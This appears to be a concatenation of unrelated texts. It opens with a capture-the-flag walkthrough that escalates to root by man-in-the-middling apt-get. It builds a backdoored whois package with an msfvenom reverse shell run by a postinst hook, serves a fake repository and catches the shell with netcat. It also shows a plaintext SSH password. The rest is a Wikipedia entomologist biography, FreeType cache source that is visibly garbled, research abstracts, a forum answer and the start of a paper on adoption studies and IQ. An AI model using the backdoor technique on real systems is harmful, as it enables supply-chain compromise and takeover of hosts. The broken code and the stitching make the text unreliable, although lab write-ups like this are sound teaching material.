And then, trigger the callback. -e /bin/bash 12345
Finally, let’s grab a TTY.
python -c 'import pty;pty.spawn("/bin/bash")' www-admin-data@onetwoseven:/var/www/html-admin/addons$
\o/ - access level: www-admin-data
www-admin-data to root
A simple sudo -l will show us the way forward.
Matching Defaults entries for www-admin-data on onetwoseven: env_reset, env_keep+="ftp_proxy http_proxy https_proxy no_proxy", mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-admin-data may run the following commands on onetwoseven: (ALL : ALL) NOPASSWD: /usr/bin/apt-get update, /usr/bin/apt-get upgrade
We see some interesting environment variables are preserved when using sudo. The first thing that comes to mind is being able to proxy connections in a way that will facilitate exploitation.
One piece of information we need to examine to confirm our suspicions is what repositories the box is configured to use. We can do that by looking in /etc/apt/sources.list.d for any .list files. These files contain repository URLs and some additional metadata for the package manager to use.
cat /etc/apt/sources.list.d/onetwoseven.list ════════════════════════════════════════════ # OneTwoSeven special packages - not yet in use deb http://packages.onetwoseven.htb/devuan ascii main
Nice! An unused repository. We’ll need to keep this URL in mind for later.
A package manager (like apt-get et. al) requests software/libraries/updates etc from remote repositories. Based on the fact that we can call both apt-get update and apt-get upgrade without a password, we can control proxy related environment variables, and that there is an unused repository configured; we can be reasonably confident that we’re able to perform a man-in-the-middle attack against the package manager. We’ll use the MitM attack to install backdoored software on the machine. Let’s see what that looks like.
Building a Backdoored Package
A word about packages from Debian’s wiki
A Debian package is a collection of files that allow for applications or libraries to be distributed via the Debian package management system. The aim of packaging is to allow the automation of installing, upgrading, configuring, and removing computer programs for Debian in a consistent manner.
Let’s start by selecting a legitimate package installed on the system. We do this because the commands we can run are update and upgrade . This means we can’t install new software. When we run update , the package manager will see there’s a new package. When we run upgrade , the package manager will then download and install that updated (backdoored) package. We’ll use dpkg to get a list of installed software.
dpkg -l ═══════ ||/ Name Version Architecture Description +++-======================================-==================================-============-=============================================================================== ii adduser 3.115 all add and remove users and groups ii apache2 2.4.25-3+deb9u6 amd64 Apache HTTP Server ii apache2-bin 2.4.25-3+deb9u6 amd64 Apache HTTP Server (modules and other binary files) -------------8<------------- ii whiptail 0.52.19-1+b1 amd64 Displays user-friendly dialog box ii whois 5.2.17~deb9u amd64 intelligent WHOIS client ii xauth 1:1.0.9-1+b2 amd64 X authentication utility -------------8<-------------
There is no rhyme or reason here, so let’s use the whois package. To find the proper version of the package we need, we’ll ask the package manager what’s currently installed.
Package Download
apt-cache show whois ════════════════════ Package: whois Version: 5.2.17~deb9u1 Installed-Size: 343 Maintainer: Marco d'Itri <[email protected]> Architecture: amd64 Depends: libc6 (>= 2.15), libidn11 (>= 1.13) Description: intelligent WHOIS client Description-md5: 28e9df99a50bdfe098edfcf773417990 Tag: implemented-in::c, interface::commandline, network::client, protocol::ip, protocol::ipv6, role::program, suite::gnu, use::checking, use::searching Section: net Priority: optional Filename: pool/DEBIAN/main/w/whois/whois_5.2.17~deb9u1_amd64.deb Size: 76772 MD5sum: ac528a3b41bcdc8e78084d61e4aa2957 SHA256: 296aa4d2bb6ee15c7db129a4a3a0c8abbf1acb75770b4ee9241a47ee2ca37551
A quick google search for 5.2.17~deb9u1 brings us to packages.debian.org/stretch/whois . Clicking through to the AMD64 download gets us the legitimate .deb file that we’ll be modifying. Below the wget command is included for your convenience.
wget http://http.us.debian.org/debian/pool/main/w/whois/whois_5.2.17~deb9u1_amd64.deb
Package Modification
Now that we’ve got our package, we can make our malicious modifications. We’ll begin by extracting the package.
dpkg-deb -R whois_5.2.17~deb9u1_amd64.deb backdoored-whois
The command above should give us the following directory structure.
backdoored-whois/ ├── DEBIAN │ ├── control │ └── md5sums └── usr ├── bin │ ├── mkpasswd │ └── whois └── share ├── doc │ └── whois -------------8<------------- ├── locale │ ├── cs │ │ └── LC_MESSAGES │ │ └── whois.mo -------------8<------------- └── man ├── man1 │ ├── mkpasswd.1.gz │ └── whois.1.gz └── man5 └── whois.conf.5.gz
Our next step is to create our callback binary; we’ll do this using msfvenom .
msfvenom -p linux/x64/shell_reverse_ipv6_tcp LHOST=dead:beef:2::1001 LPORT=12345 -f elf -o backdoored-whois/usr/bin/revshell ═══════════════════════════════════════════════════════════════════════════════════════════════════════════════════════════ [-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload [-] No arch selected, selecting arch: x64 from the payload No encoder or badchars specified, outputting raw payload Payload size: 90 bytes Final size of elf file: 210 bytes Saved as: backdoored-whois/usr/bin/revshell
You may be wondering, why ipv6? The answer is simple; I wrote the linux 64-bit bind/reverse shell payloads and enjoy putting them to use.
Don’t forget to make ./usr/bin/revshell executable!
chmod +x ./usr/bin/revshell
Next, we’ll create our postinst maintainer script. The postinst script will run after all the contents of the package are unpacked. We likely could use some of the other maintainer scripts, but we’re going to use a script to call our binary, so we want the binary to be unpacked to disk before it’s executed.
There is more information in the debian packaging documentation found here and here if you’re interested.
backdoored-whois/DEBIAN/postinst ════════════════════════════ #!/bin/sh /usr/bin/revshell &
Don’t forget to make postinst executable!
chmod 755 backdoored-whois/DEBIAN/postinst
With that done, we can repackage our malicious whois update.
dpkg-deb -b backdoored-whois ════════════════════════════ dpkg-deb: building package 'whois' in 'backdoored-whois.deb'.
That’s it for the package, now we need to build the repository structure. We’ll do that next.
Building the Repository
Recall that the target’s package manager is going to reach out to us as though we are the package repository. The package manager is going to expect a certain directory structure as well as a few files to be present. We’ll go ahead and create those now.
First, let’s create a working directory for the repository and move our backdoored-whois.deb into it.
mkdir barebones-repo mv backdoored-whois.deb barebones-repo/ cd barebones-repo
Release file
Next, we’ll create a Release file inside barebones-repo . According to the Debian wiki, “A Release file shall contain meta-information about the distribution and checksums.” To create a Release file, we’ll just copy and paste the output from apt-cache show whois from the target system (remember, we already ran this once above).
apt-cache show whois ════════════════════ Package: whois Version: 5.2.17~deb9u1 Installed-Size: 343 Maintainer: Marco d'Itri <[email protected]> Architecture: amd64 Depends: libc6 (>= 2.15), libidn11 (>= 1.13) Description: intelligent WHOIS client Description-md5: 28e9df99a50bdfe098edfcf773417990 Tag: implemented-in::c, interface::commandline, network::client, protocol::ip, protocol::ipv6, role::program, suite::gnu, use::checking, use::searching Section: net Priority: optional Filename: pool/DEBIAN/main/w/whois/whois_5.2.17~deb9u1_amd64.deb Size: 76772 MD5sum: ac528a3b41bcdc8e78084d61e4aa2957 SHA256: 296aa4d2bb6ee15c7db129a4a3a0c8abbf1acb75770b4ee9241a47ee2ca37551
Now we need to alter a few of the fields in the Release file. Specifically, we need to update the Version, Filename, Size, MD5sum, and SHA256 fields.
The first two changes are simple. We just increment the version number and the filename. We do this so that the package manager recognizes the need to update this particular package (i.e. the one installed on the target system is older than the one in the repo).
OLD LINE: Version: 5.2.17~deb9u1 NEW LINE: Version: 5.2.17~deb9u2
OLD LINE: Filename: pool/DEBIAN/main/w/whois/whois_5.2.17~deb9u1_amd64.deb NEW LINE: Filename: pool/DEBIAN/main/w/whois/whois_5.2.17~deb9u2_amd64.deb
After that, we’ll update the Size field. We just need the new size of our malicious .deb.
ls -l backdoored-whois.deb -rw-r--r-- 1 root root 77276 Aug 30 06:36 backdoored-whois.deb
OLD LINE: Size: 76772 NEW LINE: Size: 77276
Next, we update the MD5sum field. To update it, we’ll need to grab the md5 hash of our .deb.
md5sum backdoored-whois.deb 2845688fc677c713b2ef8b187d0aeb71 backdoored-whois.deb
OLD LINE: MD5sum: ac528a3b41bcdc8e78084d61e4aa2957 NEW LINE: MD5sum: 2845688fc677c713b2ef8b187d0aeb71
Finally, the SHA256 field.
sha256sum backdoored-whois.deb 725c55a28c783e6f6846694153fd2dfbf78df11fdccaf839288562aa55a67217 backdoored-whois.deb
OLD LINE: SHA256: 296aa4d2bb6ee15c7db129a4a3a0c8abbf1acb75770b4ee9241a47ee2ca37551 NEW LINE: SHA256: 725c55a28c783e6f6846694153fd2dfbf78df11fdccaf839288562aa55a67217
Great, now our Release file is complete! Next up, we need a Packages file.
Packages files
Fortunately, the content is the same as Release , so a simple copy is sufficient.
cp Release Packages
Another requirement we need to satisfy is that we need a gzipped Packages file. Again, this is a simple step.
gzip Packages -c > Packages.gz
Repository Directory Structure
We’re nearing the end of the repository setup steps. We now need to create the directory structure that the package manager expects to see.
My actual process for figuring this out was to have all of the MitM pieces in place (described below) and trying to run apt-get update . Each time I did, it would error out with messages like E: Failed to fetch http://packages.onetwoseven.htb/devuan/dists/ascii/main/binary-amd64/Packages 404 File not found . I repeatedly ran the command, checked the errors, and built the things that were needed.
The two mkdir commands below will setup our repo directories.
mkdir -p devuan/dists/ascii/main/binary-amd64 mkdir -p devuan/pool/DEBIAN/main/w/whois
Finally, we need to put all of our files in their proper places. Part of this is renaming backdoored-whois.deb to match the filename we used in the Release file.
mv backdoored-whois.deb devuan/pool/DEBIAN/main/w/whois/whois_5.2.17~deb9u2_amd64.deb mv Packages* devuan/dists/ascii/main/binary-amd64/ mv Release devuan/dists/ascii/
Our repo should look like this now.
barebones-repo/ └── devuan ├── dists │ └── ascii │ ├── main │ │ └── binary-amd64 │ │ ├── Packages │ │ └── Packages.gz │ └── Release └── pool └── DEBIAN └── main └── w └── whois └── whois_5.2.17~deb9u2_amd64.deb
That’s it! We now have a minimal repo from which we can serve up our malicious package.
Man in the Middle
Alright, we’re in the home stretch. There are a few small steps we need to take to properly handle the requests that will originate on the target machine. To begin, we’ll set up a reverse ssh tunnel to get the traffic sent to the “proxy” back to our local machine.
ssh -Nf [email protected] -R 8002:127.1:8080 [email protected]'s password: 122f1def
Where we used port 8002; the actual port doesn’t matter too much, as long as it isn’t already bound. Our proxy will listen on kali on port 8080, so that’s where we want the remote traffic to come to on kali’s localhost.
reverse tunnel options used: 8002 The port on the remote end to listen on; ( 127.1 Where the traffic flows after reaching 8002 from the point of view of the creator of the tunnel (traffic dumps out on kali; the creator's localhost) 8080 The port to which traffic is destined.
Next, we’ll set up the proxy. We’re going to use BurpSuite as our proxy. Burp listens on port 8080 by default. All we need to do is start it up. It’s dealer’s choice on how to get it started, click the icon or run the command below.
java -jar $(which burpsuite)
Also, ensure that Intercept is off.
Huzzah, we’ve set up our proxy! Now, remember when we looked at the repositories that the target machine is configured to use? We found the URL http://packages.onetwoseven.htb/devuan . All of the requests sent to our proxy will ultimately be looking for the packages.onetwoseven.htb subdomain. Since we’re impersonating this repository, we need to tell Burp that WE are deb packages.onetwoseven.htb . We’ll do this by modifying /etc/hosts .
1 /etc/hosts 2 ══════════ 3 4 localhost packages.onetwoseven.htb 5 kail 6 -------------8<-------------
With that done, Burp will proxy the requests coming to it “out” to packages.onetwoseven.htb which is really our kali’s localhost interface.
Our last step before exploitation is to start the webserver that will host the files in our repository.
cd barebones-repo python3 -m http.server 80
Now all of the pieces are in place for us to MitM the package manager. Let’s see it in action!
Before running the exploit, we need an ipv6 listener (remember the msfvenom command?).
nc -vnl6p 12345 Ncat: Version 7.70 ( https://nmap.org/ncat ) Ncat: Listening on :::12345
Now, on the target machine, we first run apt-get update followed by apt-get upgrade
sudo http_proxy= apt-get update ════════════════════════════════════════════════════ Ign:1 http://packages.onetwoseven.htb/devuan ascii InRelease Get:2 http://packages.onetwoseven.htb/devuan ascii Release [627 B] -------------8<------------- Fetched 1093 B in 12s (86 B/s) Reading package lists... Done W: The repository 'http://packages.onetwoseven.htb/devuan ascii Release' is not signed. N: Data from such a repository can't be authenticated and is therefore potentially dangerous to use. N: See apt-secure(8) manpage for repository creation and user configuration details. W: Conflicting distribution: http://packages.onetwoseven.htb/devuan ascii Release (expected ascii but got ) E: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii/main/binary-amd64/Packages Connection failed E: Failed to fetch http://de.deb.devuan.org/merged/dists/ascii-security/main/binary-amd64/Packages Connection failed E: Some index files failed to download. They have been ignored, or old ones used instead.
We see some warnings and errors in the output above, but they can be ignored.
For the upgrade command, if we see whois listed in the packages to be upgraded, we know that our exploit has at least partially worked; the package manager is going to try to upgrade the package.
sudo http_proxy= apt-get upgrade ═════════════════════════════════════════════════════ Reading package lists... Done Building dependency tree Reading state information... Done Calculating upgrade... Done The following packages will be upgraded: debian-archive-keyring tzdata whois 3 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. Need to get 77.2 kB/426 kB of archives. After this operation, 31.7 kB of additional disk space will be used. Do you want to continue? [Y/n] y y WARNING: The following packages cannot be authenticated! whois Install these packages without verification? [y/N] y y Get:1 http://packages.onetwoseven.htb/devuan ascii/main amd64 whois amd64 5.2.17~deb9u2 [77.2 kB] Fetched 77.2 kB in 0s (281 kB/s) Reading changelogs... Done -------------8<------------- Setting up whois (5.2.17~deb9u1) ... Processing triggers for man-db ( ...
If all went well, we should see a connection come back to our netcat listener.
-------------8<------------- Ncat: Connection from dead:beef::250:56ff:feb2:e2a6. Ncat: Connection from dead:beef::250:56ff:feb2:e2a6:53952. id uid=0(root) gid=0(root) groups=0(root) cat /root/root.txt 2d38...
There we go, we’ve successfully MitM’d a package manager to escalate privileges. High five!!
\o/ - root access
I hope you enjoyed this write-up or at least found something useful. Drop me a line on the HTB forums or in chat @ NetSec Focus.
Additional Resources | {
"pile_set_name": "OpenWebText2"
} |
Frederick Knab
Frederick Knab (September 22, 1865 – November 2, 1918) was an artist and entomologist active from the 1880s through the 1918, most noted for his oil paintings and illustrations and his work with coleopterous and dipterous insects.
Knab was born September 22, 1865, in Würzburg, Bavaria and came to the United States as a boy of eight with his parents, Oscar and Josephine Knab, who settled in Chicopee, Massachusetts in 1873. His father was an engraver and painter and an uncle was court painter to the King of Bavaria. In his youth, Knab showed artistic talent and a strong interest in the natural sciences, especially entomology. He studied the classic works of Charles Darwin, Alfred Russel Wallace, and Henry Walter Bates and accumulated a large collection of insects, particularly beetles (Order Coleoptera), and became an active member of the Springfield (Massachusetts) Zoological Club and an active correspondent with other coleopterists.
In 1885, Knab undertook a sixteen month collecting trip up the Amazon River, traveling from its mouth to Peru. He kept a journal of his expedition, which formed an important source of experience for his later scientific career. In 1889, he went to Europe and studied art for two years at the Munich Academy, and then established a studio in Chicopee with the intention of making landscape painting his profession.
In 1903 the Carnegie Institution of Washington provided a grant to United States Department of Agriculture entomologist Leland Ossian Howard to develop a monograph of the mosquitoes of North and Central America and the West Indies. In organizing the work Howard sought the advice of entomologist George Dimmock of Springfield as to the best observer known to him who could undertake the study of the biology of the mosquitoes of the New England region, and Dimmock nominated Knab. Knab's work produced important notes and a report illustrated by drawings which were so excellent that State Entomologist of Illinois Stephen Alfred Forbes subsequently hired Knab as a scientific illustrator, giving his abilities wider exposure.
In 1906 Knab accepted a position with the Bureau of Entomology of the United States Department of Agriculture in Washington, D.C., and became co-author of the Carnegie Institution-sponsored monograph on mosquitoes in collaboration with Leland Ossian Howard and Harrison Gray Dyar, Jr. He became an active member of the Biological Society of Washington, served as Vice-President of the Entomological Society of Washington, and was a fellow of the American Association for the Advancement of Science and the Entomological Society of America. He began working on a Doctor of Philosophy degree at George Washington University, but the final stages of his illness prevented him from completing the requirements before his death.
Knab died in Washington, D.C. on November 2, 1918, after a long and painful battle with Leishmaniasis contracted during his expedition to Brazil in 1885–1886, which he himself diagnosed through study of the South American medical literature. A bibliography of his published works was provided as an addendum to a memorial authored by three of his closest colleagues, Andrew Nelson Caudell, August Busck, and Leland Ossian Howard published in 1919.
Category:1865 births
Category:1918 deaths
Category:American entomologists | {
"pile_set_name": "Wikipedia (en)"
} |
/* */
/* ftcsbits.c */
/* */
/* FreeType sbits manager (body). */
/* */
/* Copyright 2000-2001, 2002, 2003, 2004, 2005, 2006, 2009 by */
/* David Turner, Robert Wilhelm, and Werner Lemberg. */
/* */
/* This file is part of the FreeType project, and may only be used, */
/* modified, and distributed under the terms of the FreeType project */
/* license, LICENSE.TXT. By continuing to use, modify, or distribute */
/* this file you indicate that you have read the license and */
/* understand and accept it fully. */
/* */
#include <ft2build.h>
#include FT_CACHE_H
#include "ftcsbits.h"
#include FT_ERRORS_H
#include "ftccback.h"
#include "ftcerror.h"
#define FT_COMPONENT trace_cache
/***** *****/
/***** SBIT CACHE NODES *****/
/***** *****/
static FT_Error
ftc_sbit_copy_bitmap( FTC_SBit sbit,
FT_Bitmap* bitmap,
FT_Memory memory )
FT_Error error;
FT_Int pitch = bitmap->pitch;
FT_ULong size;
if ( pitch < 0 )
pitch = -pitch;
size = (FT_ULong)( pitch * bitmap->rows );
if ( !FT_ALLOC( sbit->buffer, size ) )
FT_MEM_COPY( sbit->buffer, bitmap->buffer, size );
return error;
FT_LOCAL_DEF( void )
ftc_snode_free( FTC_Node ftcsnode,
FTC_Cache cache )
FTC_SNode snode = (FTC_SNode)ftcsnode;
FTC_SBit sbit = snode->sbits;
FT_UInt count = snode->count;
FT_Memory memory = cache->memory;
for ( ; count > 0; sbit++, count-- )
FT_FREE( sbit->buffer );
FTC_GNode_Done( FTC_GNODE( snode ), cache );
FT_FREE( snode );
FT_LOCAL_DEF( void )
FTC_SNode_Free( FTC_SNode snode,
FTC_Cache cache )
ftc_snode_free( FTC_NODE( snode ), cache );
* This function tries to load a small bitmap within a given FTC_SNode.
* Note that it returns a non-zero error code _only_ in the case of
* out-of-memory condition. For all other errors (e.g., corresponding
* to a bad font file), this function will mark the sbit as `unavailable'
* and return a value of 0.
* You should also read the comment within the @ftc_snode_compare
* function below to see how out-of-memory is handled during a lookup.
static FT_Error
ftc_snode_load( FTC_SNode snode,
FTC_Manager manager,
FT_UInt gindex,
FT_ULong *asize )
FT_Error error;
FTC_GNode gnode = FTC_GNODE( snode );
FTC_Family family = gnode->family;
FT_Memory memory = manager->memory;
FT_Face face;
FTC_SBit sbit;
FTC_SFamilyClass clazz;
if ( (FT_UInt)(gindex - gnode->gindex) >= snode->count )
FT_ERROR(( "ftc_snode_load: invalid glyph index" ));
return FTC_Err_Invalid_Argument;
sbit = snode->sbits + ( gindex - gnode->gindex );
clazz = (FTC_SFamilyClass)family->clazz;
sbit->buffer = 0;
error = clazz->family_load_glyph( family, gindex, manager, &face );
if ( error )
goto BadGlyph;
FT_Int temp;
FT_GlyphSlot slot = face->glyph;
FT_Bitmap* bitmap = &slot->bitmap;
FT_Pos xadvance, yadvance; /* FT_GlyphSlot->advance.{x|y} */
if ( slot->format != FT_GLYPH_FORMAT_BITMAP )
FT_TRACE0(( "ftc_snode_load:"
" glyph loaded didn't return a bitmap\n" ));
goto BadGlyph;
/* Check that our values fit into 8-bit containers! */
/* If this is not the case, our bitmap is too large */
/* and we will leave it as `missing' with sbit.buffer = 0 */
#define CHECK_CHAR( d ) ( temp = (FT_Char)d, temp == d )
#define CHECK_BYTE( d ) ( temp = (FT_Byte)d, temp == d )
/* horizontal advance in pixels */
xadvance = ( slot->advance.x + 32 ) >> 6;
yadvance = ( slot->advance.y + 32 ) >> 6;
if ( !CHECK_BYTE( bitmap->rows ) ||
!CHECK_BYTE( bitmap->width ) ||
!CHECK_CHAR( bitmap->pitch ) ||
!CHECK_CHAR( slot->bitmap_left ) ||
!CHECK_CHAR( slot->bitmap_top ) ||
!CHECK_CHAR( xadvance ) ||
!CHECK_CHAR( yadvance ) )
goto BadGlyph;
sbit->width = (FT_Byte)bitmap->width;
sbit->height = (FT_Byte)bitmap->rows;
sbit->pitch = (FT_Char)bitmap->pitch;
sbit->left = (FT_Char)slot->bitmap_left;
sbit->top = (FT_Char)slot->bitmap_top;
sbit->xadvance = (FT_Char)xadvance;
sbit->yadvance = (FT_Char)yadvance;
sbit->format = (FT_Byte)bitmap->pixel_mode;
sbit->max_grays = (FT_Byte)(bitmap->num_grays - 1);
/* copy the bitmap into a new buffer -- ignore error */
error = ftc_sbit_copy_bitmap( sbit, bitmap, memory );
/* now, compute size */
if ( asize )
*asize = FT_ABS( sbit->pitch ) * sbit->height;
} /* glyph loading successful */
/* ignore the errors that might have occurred -- */
/* we mark unloaded glyphs with `sbit.buffer == 0' */
/* and `width == 255', `height == 0' */
/* */
if ( error && error != FTC_Err_Out_Of_Memory )
sbit->width = 255;
sbit->height = 0;
sbit->buffer = NULL;
error = 0;
if ( asize )
*asize = 0;
return error;
FTC_SNode_New( FTC_SNode *psnode,
FTC_GQuery gquery,
FTC_Cache cache )
FT_Memory memory = cache->memory;
FT_Error error;
FTC_SNode snode = NULL;
FT_UInt gindex = gquery->gindex;
FTC_Family family = gquery->family;
FTC_SFamilyClass clazz = FTC_CACHE__SFAMILY_CLASS( cache );
FT_UInt total;
total = clazz->family_get_count( family, cache->manager );
if ( total == 0 || gindex >= total )
error = FT_Err_Invalid_Argument;
goto Exit;
if ( !FT_NEW( snode ) )
FT_UInt count, start;
start = gindex - ( gindex % FTC_SBIT_ITEMS_PER_NODE );
count = total - start;
if ( count > FTC_SBIT_ITEMS_PER_NODE )
FTC_GNode_Init( FTC_GNODE( snode ), start, family );
snode->count = count;
error = ftc_snode_load( snode,
if ( error )
FTC_SNode_Free( snode, cache );
snode = NULL;
*psnode = snode;
return error;
ftc_snode_new( FTC_Node *ftcpsnode,
FT_Pointer ftcgquery,
FTC_Cache cache )
FTC_SNode *psnode = (FTC_SNode*)ftcpsnode;
FTC_GQuery gquery = (FTC_GQuery)ftcgquery;
return FTC_SNode_New( psnode, gquery, cache );
ftc_snode_weight( FTC_Node ftcsnode,
FTC_Cache cache )
FTC_SNode snode = (FTC_SNode)ftcsnode;
FT_UInt count = snode->count;
FTC_SBit sbit = snode->sbits;
FT_Int pitch;
FT_Offset size;
FT_UNUSED( cache );
/* the node itself */
size = sizeof ( *snode );
for ( ; count > 0; count--, sbit++ )
if ( sbit->buffer )
pitch = sbit->pitch;
if ( pitch < 0 )
pitch = -pitch;
/* add the size of a given glyph image */
size += pitch * sbit->height;
return size;
#if 0
FTC_SNode_Weight( FTC_SNode snode )
return ftc_snode_weight( FTC_NODE( snode ), NULL );
#endif /* 0 */
ftc_snode_compare( FTC_Node ftcsnode,
FT_Pointer ftcgquery,
FTC_Cache cache )
FTC_SNode snode = (FTC_SNode)ftcsnode;
FTC_GQuery gquery = (FTC_GQuery)ftcgquery;
FTC_GNode gnode = FTC_GNODE( snode );
FT_UInt gindex = gquery->gindex;
FT_Bool result;
result = FT_BOOL( gnode->family == gquery->family &&
(FT_UInt)( gindex - gnode->gindex ) < snode->count );
if ( result )
/* check if we need to load the glyph bitmap now */
FTC_SBit sbit = snode->sbits + ( gindex - gnode->gindex );
* The following code illustrates what to do when you want to
* perform operations that may fail within a lookup function.
* Here, we want to load a small bitmap on-demand; we thus
* need to call the `ftc_snode_load' function which may return
* a non-zero error code only when we are out of memory (OOM).
* The correct thing to do is to use @FTC_CACHE_TRYLOOP and
* @FTC_CACHE_TRYLOOP_END in order to implement a retry loop
* that is capable of flushing the cache incrementally when
* an OOM errors occur.
* However, we need to `lock' the node before this operation to
* prevent it from being flushed within the loop.
* When we exit the loop, we unlock the node, then check the `error'
* variable. If it is non-zero, this means that the cache was
* completely flushed and that no usable memory was found to load
* the bitmap.
* We then prefer to return a value of 0 (i.e., NO MATCH). This
* ensures that the caller will try to allocate a new node.
* This operation consequently _fail_ and the lookup function
* returns the appropriate OOM error code.
* Note that `buffer == NULL && width == 255' is a hack used to
* tag `unavailable' bitmaps in the array. We should never try
* to load these.
if ( sbit->buffer == NULL && sbit->width != 255 )
FT_ULong size;
FT_Error error;
ftcsnode->ref_count++; /* lock node to prevent flushing */
/* in retry loop */
error = ftc_snode_load( snode, cache->manager, gindex, &size );
ftcsnode->ref_count--; /* unlock the node */
if ( error )
result = 0;
cache->manager->cur_weight += size;
return result;
FTC_SNode_Compare( FTC_SNode snode,
FTC_GQuery gquery,
FTC_Cache cache )
return ftc_snode_compare( FTC_NODE( snode ), gquery, cache );
/* END */
| {
"pile_set_name": "Github"
} |
The objective of this experiment was to determine the possible relationship between a sow’s ease of breeding on the first service and the farrowing rate and total born. This study was conducted in a commercial farrowing unit in the Southern United States utilizing pen gestation with stock of 6,000 head. Five hundred ninety-seven sows were bred between the months of April and May 2017 were selected for this study. All animals were inseminated using a post-cervical artificial insemination catheter unless insertion of the inner catheter was impossible. The semen dose fell within the following parameters: concentration of 1.5 x 109 sperm/40 ml, motility of ≥ 80%, abnormalities in morphology were ≤ 10% for distal and ≤ 10 % for proximal and a total of ≤ 20% total morphological abnormalities. Paper records were cross-referenced with electronic records to ensure accuracy of BQS, breeding technician, total born, and parity status of each animal. Interactions with BQS and farrowing rate were not detected (p > .05), and interactions with BQS and total born were also not detected (p > .05). Interactions with parity and BQS were detected (p < .05) with older animals (P5, P7, and P8) having higher BQS’s than younger animals (P0 and P1). The results of this study did not support the hypothesis that a sow’s BQS was related to farrowing rate or total born.
Year manuscript completed
Year degree awarded
Author's Keywords
Thesis Advisor
Alyx Shultz
Committee Member
Brian Parr
Committee Member
Laura Hoffman
Document Type
Recommended Citation
https://digitalcommons.murraystate.edu/etd/72 | {
"pile_set_name": "Pile-CC"
} |
Preventive service utilisation as a predictor for emergency dental examinations.
To quantify the relationship between receipt of routine dental care and the use of non-trauma related emergency dental services. A multiple logistic regression was run on administrative dental claim and encounter data. The model dependent variable was the use of non-trauma related emergency dental care. Predictors included previous year oral examinations, radiographs, dental cleanings and, as a control, member age. Administrative data were obtained from a dental health maintenance organisation located in the state of Texas. Claim and encounter data for 2,947 insured members were used, representing experience from 1995 through 1996. The outcome of interest was the use of non-trauma related emergency dental services. Results demonstrated empirically that those who availed themselves of preventive dental services were significantly less likely to use non-trauma related emergency services (P<0.01). The probability of needing non-trauma related dental services in 1996 was 42.7% lower among those who had an examination in 1995 when compared with those who did not. When analysed in a simple logistic regression, dental cleanings in 1995 were also significantly associated with a decreased probability of needing non-trauma related emergency services. However, this relationship did not hold in the controlled model, which was probably due to multicollinearity. This study provides evidence of the value of periodic preventive dental examinations and services. Those who receive such services are less likely to use non-trauma related emergency dental services. | {
"pile_set_name": "PubMed Abstracts"
} |
In *nix, how to determine which filesystem a particular file is on?
In a generic, modern unix environment (say, GNU/Linux, GNU/Solaris, or Mac OS X), is there a good way to determine which mountpoint and filesystem-type a particular absolute file path is on?
I suppose I could execute the mount command and manually parse the output of that and string-compare it with my file path, but before I do that I'm wondering if there's a more elegant way.
I'm developing a BASH script that makes use of extended attributes, and want to make it Do The Right Thing (to the small extent that it is possible) for a variety of filesystems and host environments.
The command df(1) takes one or more arguments and will return the mountpoint and device on which that file or directory exists, as well as usage information. You can then use the path or device to look up the filesystem type in the output of mount -v or similar.
Unfortunately, the output format of both df and mount are system-dependent; there is no apparent standard, at least as I can see between Solaris, NetBSD and Mac OS X.
You could use stat. The command stat --printf '%d' filename.txt will return the device number as hex/decimal.
For just a specific file it's as easy as
df -T "${FILE}" | awk '{print $2}' | tail -n1
| {
"pile_set_name": "StackExchange"
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New data supports finding that 30% of servers are ‘comatose’ [pdf] - r721
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1. Introduction {#sec1-jintelligence-05-00001}
Generally, Black people, White people, and East Asian people have different average IQs, but the specific reasons for this remain controversial. Of various bodies of evidence, one has been nominated as "one of the most powerful" for explaining these racial IQ differences: the IQs of adoptees of different races raised by White adoptive parents \[[@B1-jintelligence-05-00001]\] (p. 25). Several psychologists have reviewed studies of transracial adoptees' IQs and used them as evidence for two claims. The first is that East Asian adoptees raised by Whites have higher average IQs than the general White population; that White adoptees raised by Whites in turn have higher average IQs than Black adoptees raised by Whites; and that multiracial adoptees have an expected IQ that is a weighted average of their ancestral groups' mean IQs (so that adoptees born to a White genetic parent and a Black genetic parent, for example, have an average IQ midway between those of Whites and Blacks). This would suggest that racial IQ differences persist even among children raised in nurturing adoptive homes, intimating that differences in home environments cannot explain racial IQ differences. This leads into the second claim: that most of the racial IQ differences between East Asians, Whites, and Blacks are genetic \[[@B1-jintelligence-05-00001],[@B2-jintelligence-05-00001],[@B3-jintelligence-05-00001]\]. In this paper, I call the conjunction of these two claims the *hereditarian* hypothesis or model, after Rushton and Jensen \[[@B3-jintelligence-05-00001]\] (pp. 239--240, 259).
This paper reanalyzes the adoption studies cited to support these claims, and puts forth an alternative explanation: most of the average racial IQ differences in those studies are spurious, arising from methodological issues and disregard of contrary results. When all of the cited data are considered with these issues in mind, they are not compelling evidence for large and consistent IQ differences between East Asian, White, and Black adoptees raised by White parents. This paper then introduces further adoption data which have yet to be considered in the race and IQ debate. The totality of the data turn out to be at least as consonant with a *nil* hypothesis or model: the IQs of adoptees raised by Whites in comparable environments are hardly affected by the adoptees' race.
2. Methodological Issues {#sec2-jintelligence-05-00001}
The innovation of this paper is that it accounts for four methodological issues which imperil analyses of transracial adoption studies of IQ. Two of the issues are examples of the generic scientific problem of confounded comparisons of groups, and the third is a type of selection bias.
Firstly, if a sample of adoptees of one race or ethnicity scores above another ethnic group's general-population average, one cannot automatically attribute the above-average score to the adoptees' ethnicity. The adoptees are *adoptees*, and adoptees are typically raised in unrepresentative environments which tend to be more nurturing and high in socioeconomic status. Unusually wholesome environments could then explain the adoptees' above-average IQ, rather than the adoptees' race; race and environment would be confounded. (Indeed, the adoptees themselves are likely to be unrepresentative of their own race, and a sceptic could conceivably attribute the adoptees' above-average IQ to their very unrepresentativeness, regardless of environment.). The two most obvious ways to control away this confounding are to compare adoptees against only other adoptees, or to adjust the adoptees' observed IQs downwards to allow for the adoptees' better environments.
